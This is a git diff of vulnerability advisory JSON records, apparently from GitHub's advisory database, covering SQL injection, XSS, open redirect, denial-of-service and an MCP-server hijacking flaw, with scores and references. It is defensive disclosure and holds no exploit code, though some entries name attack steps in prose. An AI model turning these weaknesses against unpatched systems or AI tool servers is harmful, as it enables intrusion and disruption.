b/advisories/unreviewed/2026/02/GHSA-p8gw-hvf3-xmc4/GHSA-p8gw-hvf3-xmc4.json new file mode 100644 index 0000000000000..ea3813aae3b47 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p8gw-hvf3-xmc4/GHSA-p8gw-hvf3-xmc4.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8gw-hvf3-xmc4", + "modified": "2026-02-14T15:32:18Z", + "published": "2026-02-14T15:32:18Z", + "aliases": [ + "CVE-2026-23118" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nrxrpc: Fix data-race warning and potential load/store tearing\n\nFix the following:\n\n BUG: KCSAN: data-race in rxrpc_peer_keepalive_worker / rxrpc_send_data_packet\n\nwhich is reporting an issue with the reads and writes to ->last_tx_at in:\n\n conn->peer->last_tx_at = ktime_get_seconds();\n\nand:\n\n keepalive_at = peer->last_tx_at + RXRPC_KEEPALIVE_TIME;\n\nThe lockless accesses to these to values aren't actually a problem as the\nread only needs an approximate time of last transmission for the purposes\nof deciding whether or not the transmission of a keepalive packet is\nwarranted yet.\n\nAlso, as ->last_tx_at is a 64-bit value, tearing can occur on a 32-bit\narch.\n\nFix both of these by switching to an unsigned int for ->last_tx_at and only\nstoring the LSW of the time64_t. It can then be reconstructed at need\nprovided no more than 68 years has elapsed since the last transmission.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23118" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5d5fe8bcd331f1e34e0943ec7c18432edfcf0e8b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c08cf314191cd0f8699089715efb9eff030f0086" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f8cf1368e0a5491b27189a695c36f64e48f3d19d" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T15:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json b/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json new file mode 100644 index 0000000000000..4d6ff1e284dfc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8m9-mjw8-hvvx", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2691" + ], + "details": "A vulnerability has been found in itsourcecode Event Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/manage_register.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2691" + }, + { + "type": "WEB", + "url": "https://github.com/ltranquility/CVE/issues/40" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346491" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346491" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754240" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json b/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json new file mode 100644 index 0000000000000..a3fcb58a32c52 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8ww-f2v2-hj7q", + "modified": "2026-02-12T21:31:26Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20638" + ], + "details": "A logic issue was addressed with improved checks. This issue is fixed in iOS 26.3 and iPadOS 26.3. A user with Live Caller ID app extensions turned off could have identifying information leaked to the extensions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20638" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json b/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json new file mode 100644 index 0000000000000..4519f57b02b0b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p922-cfp2-x9v3", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27319" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27319" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json b/advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json new file mode 100644 index 0000000000000..3bbf46aceb5ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p937-j3mh-5m6r", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-70846" + ], + "details": "lty628 aidigu v1.9.1 is vulnerable to Cross Site Scripting (XSS) on the /tools/Password/add page in the input field password.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70846" + }, + { + "type": "WEB", + "url": "https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70846" + }, + { + "type": "WEB", + "url": "https://github.com/lty628/aidigu" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json b/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json new file mode 100644 index 0000000000000..11cebe327cd98 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p94w-qfcw-pq69", + "modified": "2026-02-12T21:31:25Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-62854" + ], + "details": "An uncontrolled resource consumption vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62854" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json b/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json new file mode 100644 index 0000000000000..4cae2aebed17e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p97j-p47c-p6g9", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2026-27069" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Soledad soledad allows DOM-Based XSS.This issue affects Soledad: from n/a through <= 8.7.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27069" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/soledad/vulnerability/wordpress-soledad-theme-8-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json b/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json index 9b7cb193a2e8e..e34377f86fd72 100644 --- a/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json +++ b/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-pc33-gmp7-wv52/GHSA-pc33-gmp7-wv52.json b/advisories/unreviewed/2026/02/GHSA-pc33-gmp7-wv52/GHSA-pc33-gmp7-wv52.json new file mode 100644 index 0000000000000..8838a8ae2ce13 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pc33-gmp7-wv52/GHSA-pc33-gmp7-wv52.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc33-gmp7-wv52", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2023-20548" + ], + "details": "A Time-of-check time-of-use (TOCTOU) race condition in the AMD Secure Processor (ASP) could allow an attacker to corrupt memory resulting in loss of integrity, confidentiality, or availability.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20548" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json new file mode 100644 index 0000000000000..edb136c8f66c1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc38-57g8-39gg", + "modified": "2026-02-18T15:31:24Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2025-69752" + ], + "details": "An issue in the \"My Details\" user profile functionality of Ideagen Q-Pulse 7.1.0.32 allows an authenticated user to view other users' profile information by modifying the objectKey HTTP parameter in the My Details page URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69752" + }, + { + "type": "WEB", + "url": "https://github.com/brtsec/public-advisories/tree/main/advisories/CVE-2025-69752" + }, + { + "type": "WEB", + "url": "http://ideagen.com" + }, + { + "type": "WEB", + "url": "http://q-pulse.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T16:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc7g-8v63-q7v6/GHSA-pc7g-8v63-q7v6.json b/advisories/unreviewed/2026/02/GHSA-pc7g-8v63-q7v6/GHSA-pc7g-8v63-q7v6.json new file mode 100644 index 0000000000000..93141c2b0950f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pc7g-8v63-q7v6/GHSA-pc7g-8v63-q7v6.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc7g-8v63-q7v6", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2709" + ], + "details": "A flaw has been found in busy up to 2.5.5. The affected element is an unknown function of the file source-code/busy-master/src/server/app.js of the component Callback Handler. Executing a manipulation of the argument state can lead to open redirect. It is possible to launch the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2709" + }, + { + "type": "WEB", + "url": "https://github.com/busyorg/busy/issues/2287" + }, + { + "type": "WEB", + "url": "https://github.com/busyorg/busy/issues/2287#issue-3905518966" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346661" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346661" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753299" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json b/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json index 229962aa0413c..fddf048bfea40 100644 --- a/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json +++ b/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pc84-8mjq-pcg8", - "modified": "2026-02-04T15:30:29Z", + "modified": "2026-02-11T18:31:26Z", "published": "2026-02-04T15:30:29Z", "aliases": [ "CVE-2025-70997" ], "details": "A vulnerability has been discovered in eladmin v2.7 and before. This vulnerability allows for an arbitrary user password reset under any user permission level.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,11 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284", + "CWE-863" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-04T15:16:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pcm2-gfvw-8jpr/GHSA-pcm2-gfvw-8jpr.json b/advisories/unreviewed/2026/02/GHSA-pcm2-gfvw-8jpr/GHSA-pcm2-gfvw-8jpr.json new file mode 100644 index 0000000000000..68a3d71f00fc4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pcm2-gfvw-8jpr/GHSA-pcm2-gfvw-8jpr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pcm2-gfvw-8jpr", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25399" + ], + "details": "IPFire 2.21 Core Update 127 contains multiple stored cross-site scripting vulnerabilities in the extrahd.cgi script that allow attackers to inject malicious scripts through the FS, PATH, and UUID parameters. Attackers can submit POST requests with script payloads in these parameters to execute arbitrary JavaScript in the context of authenticated administrator sessions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25399" + }, + { + "type": "WEB", + "url": "https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46344" + }, + { + "type": "WEB", + "url": "https://www.ipfire.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ipfire-core-update-stored-xss-via-extrahdcgi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pcm2-mwj5-74rq/GHSA-pcm2-mwj5-74rq.json b/advisories/unreviewed/2026/02/GHSA-pcm2-mwj5-74rq/GHSA-pcm2-mwj5-74rq.json index 599cc5a4654ff..0c849f487f17c 100644 --- a/advisories/unreviewed/2026/02/GHSA-pcm2-mwj5-74rq/GHSA-pcm2-mwj5-74rq.json +++ b/advisories/unreviewed/2026/02/GHSA-pcm2-mwj5-74rq/GHSA-pcm2-mwj5-74rq.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-pcxg-vcf2-rp56/GHSA-pcxg-vcf2-rp56.json b/advisories/unreviewed/2026/02/GHSA-pcxg-vcf2-rp56/GHSA-pcxg-vcf2-rp56.json new file mode 100644 index 0000000000000..52a6c8835ab02 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pcxg-vcf2-rp56/GHSA-pcxg-vcf2-rp56.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pcxg-vcf2-rp56", + "modified": "2026-02-19T21:30:47Z", + "published": "2026-02-19T21:30:47Z", + "aliases": [ + "CVE-2026-23621" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain an arbitrary directory existence enumeration vulnerability in the ListServer.IsPathExist() web method exposed at /MailEssentials/pages/MailSecurity/ListServer.aspx/IsPathExist. An authenticated user can supply an unrestricted filesystem path via the JSON key \\\"path\\\", which is URL-decoded and passed to Directory.Exists(), allowing the attacker to determine whether arbitrary directories exist on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23621" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-listserver-ispathexist-absolute-directory-traversal-to-file-enumeration" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T19:22:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pf2p-f275-6cmx/GHSA-pf2p-f275-6cmx.json b/advisories/unreviewed/2026/02/GHSA-pf2p-f275-6cmx/GHSA-pf2p-f275-6cmx.json new file mode 100644 index 0000000000000..b79f07ce911b5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pf2p-f275-6cmx/GHSA-pf2p-f275-6cmx.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf2p-f275-6cmx", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2703" + ], + "details": "A weakness has been identified in xlnt-community xlnt up to 1.6.1. Impacted is the function xlnt::detail::decode_base64 of the file source/detail/cryptography/base64.cpp of the component Encrypted XLSX File Parser. Executing a manipulation can lead to off-by-one. The attack requires local access. The exploit has been made available to the public and could be used for attacks. This patch is called f2d7bf494e5c52706843cf7eb9892821bffb0734. Applying a patch is advised to resolve this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2703" + }, + { + "type": "WEB", + "url": "https://github.com/xlnt-community/xlnt/issues/137" + }, + { + "type": "WEB", + "url": "https://github.com/xlnt-community/xlnt/commit/f2d7bf494e5c52706843cf7eb9892821bffb0734" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0128/blob/main/xl1/repro" + }, + { + "type": "WEB", + "url": "https://github.com/xlnt-community/xlnt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346649" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346649" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754377" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pf56-pmmh-5pxf/GHSA-pf56-pmmh-5pxf.json b/advisories/unreviewed/2026/02/GHSA-pf56-pmmh-5pxf/GHSA-pf56-pmmh-5pxf.json new file mode 100644 index 0000000000000..e3c436cdadc36 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pf56-pmmh-5pxf/GHSA-pf56-pmmh-5pxf.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf56-pmmh-5pxf", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37188" + ], + "details": "SpotOutlook 1.2.6 contains a denial of service vulnerability in the registration name input field that allows attackers to crash the application. Attackers can overwrite the buffer by pasting 1000 'A' characters into the 'Name' field, causing the application to become unresponsive.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37188" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47906" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotoutlook-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pf56-w9mv-33wc/GHSA-pf56-w9mv-33wc.json b/advisories/unreviewed/2026/02/GHSA-pf56-w9mv-33wc/GHSA-pf56-w9mv-33wc.json index 5a465c71afacc..f6009b759ac39 100644 --- a/advisories/unreviewed/2026/02/GHSA-pf56-w9mv-33wc/GHSA-pf56-w9mv-33wc.json +++ b/advisories/unreviewed/2026/02/GHSA-pf56-w9mv-33wc/GHSA-pf56-w9mv-33wc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pf56-w9mv-33wc", - "modified": "2026-02-10T06:30:38Z", + "modified": "2026-02-17T15:31:33Z", "published": "2026-02-10T06:30:38Z", "aliases": [ "CVE-2026-24319" @@ -30,6 +30,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-312", "CWE-316" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json b/advisories/unreviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json deleted file mode 100644 index e34394db1cbb2..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pfv4-wmph-5gc6", - "modified": "2026-02-09T09:30:22Z", - "published": "2026-02-09T09:30:22Z", - "aliases": [ - "CVE-2026-25905" - ], - "details": "The Python code being run by 'runPython' or 'runPythonAsync' is not isolated from the rest of the JS code, allowing any Python code to use the Pyodide APIs to modify the JS environment. This may result in an attacker hijacking the MCP server - for malicious purposes including MCP tool shadowing. Note - the \"mcp-run-python\" project is archived and unlikely to receive a fix.", - "severity": [ - { - "type": "CVSS_V3", - "score": 